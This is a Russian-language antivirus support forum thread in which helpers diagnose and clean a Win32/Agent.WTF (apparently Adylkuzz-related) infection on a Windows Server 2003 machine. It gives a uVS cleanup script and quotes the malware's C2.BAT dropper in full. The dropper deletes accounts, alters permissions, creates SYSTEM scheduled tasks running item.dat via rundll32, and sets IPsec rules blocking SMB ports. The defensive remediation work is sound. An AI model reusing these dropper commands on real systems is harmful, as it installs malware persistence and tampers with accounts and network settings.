Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;

Сообщений: 6

Баллов: 3

Регистрация: 09.06.2017

Размещено 09.06.2017 11:19:02

Как видим, троян и процессы, её запускающие, не удаляются. В планировщике появилось 2 новых задания. В автозапуске 2 новых процесса. Как понял, троян появился только-только. Первые упоминания с 1 июня в сети. НОД пока что только обнаруживает и удаляет создаваемый исполняемый файл.

WinServ2003, NOD32 File Security

Скрытый текст
08.06.2017 18:36:14;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; 08.06.2017 15:36:13;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа 08.06.2017 11:36:15;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; 08.06.2017 7:36:11;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; 08.06.2017 1:36:10;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; 07.06.2017 22:35:10;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; 07.06.2017 18:35:08;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; 07.06.2017 15:35:32;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; 07.06.2017 12:39:11;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; 07.06.2017 12:37:09;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; 07.06.2017 12:37:07;Модуль сканирования файлов, исполняемых при запуске системы;неизвестно;Startup;Win32/Agent.WTF троянская программа;содержит зараженные файлы 07.06.2017 12:35:08;Модуль сканирования файлов, исполняемых при запуске системы;файл;c:\windows\debug\item.dat;Win32/Agent.WTF троянская программа

Скрытый текст

08.06.2017 18:36:14;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;
08.06.2017 15:36:13;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа
08.06.2017 11:36:15;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;
08.06.2017 7:36:11;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;
08.06.2017 1:36:10;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;
07.06.2017 22:35:10;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;
07.06.2017 18:35:08;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;
07.06.2017 15:35:32;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;
07.06.2017 12:39:11;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;
07.06.2017 12:37:09;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;
07.06.2017 12:37:07;Модуль сканирования файлов, исполняемых при запуске системы;неизвестно;Startup;Win32/Agent.WTF троянская программа;содержит зараженные файлы
07.06.2017 12:35:08;Модуль сканирования файлов, исполняемых при запуске системы;файл;c:\windows\debug\item.dat;Win32/Agent.WTF троянская программа

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 09.06.2017 11:27:19

Андрей,
добавьте образ автозапуска системы в uVS.
(инструкция как это сделать в моей подписи)
------
+
вопрос:
сервер 2003 доступен из внешней сети?
если да, то надо подумать о безопасности сервера, не ровен час и WannaCry может прилететь, если порты открыты во внешнюю сеть.

[ Как создать образ автозапуска? ]

Сообщений: 6234

Баллов: 4987

Регистрация: 25.05.2010

Размещено 09.06.2017 13:41:13

Судя по всему здесь должна быть запись в WMI

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 09.06.2017 14:35:27

RP55,
подождем образ, из него будет все понятно.

[ Как создать образ автозапуска? ]

Сообщений: 6

Баллов: 3

Регистрация: 09.06.2017

Размещено 09.06.2017 15:23:00

Вот ссылка на полный образ:

https://yadi.sk/d/8PzI8dmW3JyJxh

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 09.06.2017 15:27:23

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"

Код
;uVS v4.0.5 [http://dsrt.dyndns.org] ;Target OS: NTv5.2 v400c OFFSGNSAVE regt 35 ;------------------------autoscript--------------------------- delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER] apply ; Java(TM) 6 Update 22 exec MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F83216022FF} /quiet deltmp delref %Sys32%\BLANK.HTM delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID] delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID] delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID] delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID] delref {761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\[CLSID] delref {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBC}\[CLSID] delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID] delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID] delref {764BF0E1-F219-11CE-972D-00AA00A14F56}\[CLSID] delref {853FE2B1-B769-11D0-9C4E-00C04FB6C6FA}\[CLSID] delref {FAC3CBF6-8697-43D0-BAB9-DCD1FCE19D75}\[CLSID] delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\1\V8_1AF_53.TMP delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.135\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.99\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\1\V8_1A_E.TMP delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.57\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.25.5\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.23.9\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.27.5\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.26.9\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.69\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.149\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.145\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.2.183.39\GOOPDATE.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.115\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.79\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\1\V8_25B_E.TMP delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.65\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.30.3\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.28.1\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.123\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.24.7\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\1\V8_5_66.TMP delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.153\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.33.3\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.28.13\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.29.5\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.32.7\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.25.11\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.24.15\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.165\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.22.3\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.29.1\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.111\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.28.15\PSUSER.DLL delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.22.5\PSUSER.DLL ;------------------------------------------------------------- restart

Код


;uVS v4.0.5 [http://dsrt.dyndns.org]
;Target OS: NTv5.2
v400c
OFFSGNSAVE
regt 35
;------------------------autoscript---------------------------

delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
apply

; Java(TM) 6 Update 22
exec MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F83216022FF} /quiet
deltmp
delref %Sys32%\BLANK.HTM
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\[CLSID]
delref {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBC}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref {764BF0E1-F219-11CE-972D-00AA00A14F56}\[CLSID]
delref {853FE2B1-B769-11D0-9C4E-00C04FB6C6FA}\[CLSID]
delref {FAC3CBF6-8697-43D0-BAB9-DCD1FCE19D75}\[CLSID]
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\1\V8_1AF_53.TMP
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.135\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.99\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\1\V8_1A_E.TMP
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.57\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.25.5\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.23.9\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.27.5\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.26.9\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.69\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.149\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.145\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.2.183.39\GOOPDATE.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.115\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.79\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\1\V8_25B_E.TMP
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.65\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.30.3\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.28.1\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.123\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.24.7\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\1\V8_5_66.TMP
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.153\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.33.3\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.28.13\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.29.5\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.32.7\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.25.11\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.24.15\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.165\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.22.3\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.29.1\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.21.111\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.28.15\PSUSER.DLL
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\APPLICATION DATA\GOOGLE\UPDATE\1.3.22.5\PSUSER.DLL
;-------------------------------------------------------------

restart

перезагрузка, пишем о старых и новых проблемах.
------------
далее,
сделайте дополнительно быструю проверку системы в малваребайт
http://forum.esetnod32.ru/forum9/topic10688/

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 09.06.2017 15:29:14

если же подобные угрозы фиксируются на других компутерах в локальной сети,
то добавляйте образы автозапуска по всем компам, где есть подобные логи в журнале угроз.

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 09.06.2017 15:33:46

+
проверьте,
кем создана эта политика безопасности ipsec,
Active IPSec Policy [Local]: SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{66ff4bd3-c14c-41bb-8f5b-2f23f3ccf97d}
если не вами, то ее лучше отключить.
------------
судя по содержимому c2.bat таки политика ipsec создана зловредом.
заархивируйте этот файл с паролем infected и вышлите в почту [email protected]
C:\WINDOWS\DEBUG\C2.BAT

Цитата
ping 127.0.0.1 -n 10 net1 user IISUSER$ /del&net1 user IUSR_Servs /del cacls c:\windows\twain_32\csrss.exe /e /d system&cacls c:\windows\twain_32\csrss.exe /e /d everyone&del c:\windows\twain_32\. schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F schtasks /create /tn "ok" /tr "rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa" /ru "system" /sc onstart /F netsh ipsec static add policy name=win netsh ipsec static add filterlist name=Allowlist netsh ipsec static add filterlist name=denylist netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135 netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137 netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138 netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139 netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445 netsh ipsec static add filteraction name=Allow action=permit netsh ipsec static add filteraction name=deny action=block netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny netsh ipsec static set policy name=win assign=y ver \| find "5.1." > NUL && sc config SharedAccess start= auto && net start SharedAccess && netsh firewall set opmode mode=enable && netsh firewall set portopening protocol = ALL port = 445 name = 445 mode = DISABLE scope = ALL profile = ALL @Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe @Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\system\svchost.exe'" Call Terminate &del C:\Windows\system\svchost.exe @Wmic Process Where "Name='svchost.ex

Цитата

ping 127.0.0.1 -n 10
net1 user IISUSER$ /del&net1 user IUSR_Servs /del
cacls c:\windows\twain_32\csrss.exe /e /d system&cacls c:\windows\twain_32\csrss.exe /e /d everyone&del c:\windows\twain_32\*.*
schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
schtasks /create /tn "ok" /tr "rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
netsh ipsec static add policy name=win
netsh ipsec static add filterlist name=Allowlist
netsh ipsec static add filterlist name=denylist
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
netsh ipsec static add filteraction name=Allow action=permit
netsh ipsec static add filteraction name=deny action=block
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
netsh ipsec static set policy name=win assign=y
ver | find "5.1." > NUL && sc config SharedAccess start= auto && net start SharedAccess && netsh firewall set opmode mode=enable && netsh firewall set portopening protocol = ALL port = 445 name = 445 mode = DISABLE scope = ALL profile = ALL
@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\system\svchost.exe'" Call Terminate &del C:\Windows\system\svchost.exe
@Wmic Process Where "Name='svchost.ex

[ Как создать образ автозапуска? ]

Сообщений: 6234

Баллов: 4987

Регистрация: 25.05.2010

Размещено 09.06.2017 18:51:09

Андрей Пахомов

Там ещё файлик.

C:\WINDOWS\DEBUG\C2.BAT

Его нужно удалить.

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 09.06.2017 19:27:37

Это похоже на Adylkuzz, судя по тому что закрывается доступ к указанным портам.

Цитата
Попав на компьютер жертвы Adylkuzz сканирует компьютер на наличие своих же копий, завершает их, блокирует SMB-коммуникации, определяет публичный IP-адрес жертвы, загружает инструкции и криптомайнер. Похоже, существует несколько серверов управления вирусом, откуда он загружает инструкции и необходимые модули. Интересен ещё и такой факт: попадая на компьютер жертвы, Adylkuzz как бы закрывает дверь изнутри и вирус WannaCry просто не может на него проникнуть. То есть распространение одного вируса, способствовало подавлению эпидемии распространения другого.

Цитата

Попав на компьютер жертвы Adylkuzz сканирует компьютер на наличие своих же копий, завершает их, блокирует SMB-коммуникации, определяет публичный IP-адрес жертвы, загружает инструкции и криптомайнер. Похоже, существует несколько серверов управления вирусом, откуда он загружает инструкции и необходимые модули.

Интересен ещё и такой факт: попадая на компьютер жертвы, Adylkuzz как бы закрывает дверь изнутри и вирус WannaCry просто не может на него проникнуть. То есть распространение одного вируса, способствовало подавлению эпидемии распространения другого.

https://habrahabr.ru/post/328932/

Цитата
On Friday, May 12, attackers spread a massive ransomware attack worldwide using the EternalBlue exploit to rapidly propagate the malware over corporate LANs and wireless networks. EternalBlue, originally exposed on April 14 as part of the Shadow Brokers dump of NSA hacking tools, leverages a vulnerability (MS17-010) in Microsoft Server Message Block (SMB) on TCP port 445 to discover vulnerable computers on a network and laterally spread malicious payloads of the attacker’s choice. This particular attack also appeared to use an NSA backdoor called DoublePulsar to actually install the ransomware known as WannaCry. Over the subsequent weekend, however, we discovered another very large-scale attack using both EternalBlue and DoublePulsar to install the cryptocurrency miner Adylkuzz. Initial statistics suggest that this attack may be larger in scale than WannaCry: because this attack shuts down SMB networking to prevent further infections with other malware (including the WannaCry worm) via that same vulnerability, it may have in fact limited the spread of last week’s WannaCry infection.

Цитата

On Friday, May 12, attackers spread a massive ransomware attack worldwide using the EternalBlue exploit to rapidly propagate the malware over corporate LANs and wireless networks. EternalBlue, originally exposed on April 14 as part of the Shadow Brokers dump of NSA hacking tools, leverages a vulnerability (MS17-010) in Microsoft Server Message Block (SMB) on TCP port 445 to discover vulnerable computers on a network and laterally spread malicious payloads of the attacker’s choice. This particular attack also appeared to use an NSA backdoor called DoublePulsar to actually install the ransomware known as WannaCry.

Over the subsequent weekend, however, we discovered another very large-scale attack using both EternalBlue and DoublePulsar to install the cryptocurrency miner Adylkuzz. Initial statistics suggest that this attack may be larger in scale than WannaCry: because this attack shuts down SMB networking to prevent further infections with other malware (including the WannaCry worm) via that same vulnerability, it may have in fact limited the spread of last week’s WannaCry infection.

Однако в последующие выходные мы обнаружили еще одну очень крупную атаку с использованием как EternalBlue, так и DoublePulsar для установки майнера криптовалюты Adylkuzz. Первоначальная статистика показывает, что эта атака может быть больше по масштабу, чем WannaCry: поскольку эта атака отключает SMB-сеть, чтобы предотвратить дальнейшие заражения другими вредоносными программами (включая червя WannaCry) с помощью той же уязвимости, возможно, это ограничило распространение на прошлой неделе Инфекция WannaCry.

https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar

[ Как создать образ автозапуска? ]

[ Закрыто ] Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; , ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER